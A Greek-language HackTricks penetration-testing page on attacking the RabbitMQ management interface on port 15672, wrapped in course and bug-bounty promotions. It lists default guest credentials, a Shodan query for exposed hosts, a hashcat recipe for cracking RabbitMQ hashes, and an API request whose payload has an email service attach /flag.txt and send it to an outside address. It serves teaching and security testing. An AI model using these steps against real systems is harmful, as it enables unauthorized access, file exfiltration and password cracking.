hacktricks/network-services-pentesting/15672-pentesting-rabbitmq-management.md

84 lines
6.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 15672 - Ελεγχος Εισβολής στη Διαχείριση του RabbitMQ
<details>
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρός Συνεργάτης της Ομάδας HackTricks στο AWS)</strong></a><strong>!</strong></summary>
Άλλοι τρόποι υποστήριξης των HackTricks:
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στα HackTricks** ή να **κατεβάσετε τα HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
</details>
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Συμβουλή για bug bounty**: **Εγγραφείτε** στο **Intigriti**, μια πρεμιέρα **πλατφόρμα bug bounty δημιουργημένη από χάκερς, για χάκερς**! Γίνετε μέλος στο [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) σήμερα, και αρχίστε να κερδίζετε αμοιβές έως και **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Βασικές Πληροφορίες
Μπορείτε να μάθετε περισσότερα για το RabbitMQ στο [**5671,5672 - Ελεγχος Εισβολής στο AMQP**](5671-5672-pentesting-amqp.md).\
Σε αυτή τη θύρα μπορείτε να βρείτε τον διακεκριμένο διακομιστή RabbitMQ Management εάν το [πρόσθετο διαχείρισης](https://www.rabbitmq.com/management.html) είναι ενεργοποιημένο.\
Η κύρια σελίδα θα πρέπει να μοιάζει με αυτήν:
![](<../.gitbook/assets/image (270).png>)
## Απαρίθμηση
Οι προεπιλεγμένες διαπιστευτήρια είναι "_**guest**_":"_**guest**_". Αν δεν λειτουργούν, μπορείτε να δοκιμάσετε να [**εκτελέσετε βίαιη εισβολή στην είσοδο**](../generic-methodologies-and-resources/brute-force.md#http-post-form).
Για να ξεκινήσετε χειροκίνητα αυτή την ενότητα πρέπει να εκτελέσετε:
```
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
```
Αφού έχετε ελέγξει σωστά τα διαπιστευτήριά σας, θα δείτε τη διαχειριστική κονσόλα:
![](<../.gitbook/assets/image (271) (1).png>)
Επίσης, αν έχετε έγκυρα διαπιστευτήρια, μπορεί να σας ενδιαφέρει η πληροφορία του `http://localhost:15672/api/connections`
Σημειώστε επίσης ότι είναι δυνατόν να **δημοσιεύσετε δεδομένα μέσα σε μια ουρά** χρησιμοποιώντας το API αυτής της υπηρεσίας με ένα αίτημα όπως:
```bash
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```
## Αποκωδικοποίηση Hash
```bash
echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist
```
### Shodan
* `port:15672 http`
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Συμβουλή για ανταμοιβή ευρημάτων προβλημάτων**: **Εγγραφείτε** στο **Intigriti**, μια πρεμιέρα **πλατφόρμα ανταμοιβής ευρημάτων προβλημάτων δημιουργημένη από χάκερς, για χάκερς**! Γίνετε μέλος στο [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) σήμερα, και αρχίστε να κερδίζετε ανταμοιβές μέχρι **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Άλλοι τρόποι υποστήριξης του HackTricks:
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
</details>